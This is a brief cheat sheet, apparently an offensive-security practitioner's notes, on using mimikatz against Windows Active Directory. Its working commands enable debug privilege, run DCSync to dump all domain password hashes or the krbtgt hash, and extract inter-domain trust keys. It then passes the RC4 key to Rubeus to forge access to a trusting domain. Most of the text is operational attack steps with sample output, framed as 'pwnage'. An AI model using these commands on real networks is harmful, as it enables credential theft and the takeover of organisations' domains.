# mimikatz.exe

A little tool to play with Windows security.

# Get ready to work with mimikatz

Before running mimikatz, you'll want to launch a command prompt with admin rights, then:

mimikatz.exe
privilege::debug

# Extract all hashes from a domain controller (when you have DA rights)

lsadump::dcsync /domain:domain.com /all /csv

# Extract hashes of a single user

lsadump::dcsync /domain:domain.com /user:krbtgt

# Extract domain trust keys

For example, if you have pwn3d domain2.com and want to extract trust keys for domain1.com, first look up the victim domain's GUID, and then you can do this from your mimikatz prompt where you have full rights:

lsadump::dcsync /guid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx }/domain:domain2.com

The output will look something like:

<snip>
[OUT] DOMAIN1.COM -> DOMAIN2.COM
* 1/1/2024 7:11 a.m. - CLEAR - ....<snip>
....</snip>
aes256_hmac: BLAHBLAH
aes128_hmac: BLAHBLAH
rc4_hmac_nt: IMPORTANT!
</snip>

Take the rc4_hmac_nt value and then use Rubeus to get a TGT for DOMAIN.COM.

More good stuff about abusing domain trusts here and I found this example to be excellent for walking you through a pwnage situation where you've got DA on DOMAIN2.COM and want to pwn DOMAIN1.COM via a trust relationship.

TIP

One time mimikatz threw an error (unfortunately I didn't write it down) about not being able to extract krbtgt account, but after reading this article I learned I had to use the /domain flag to specify the domain I was dumping from.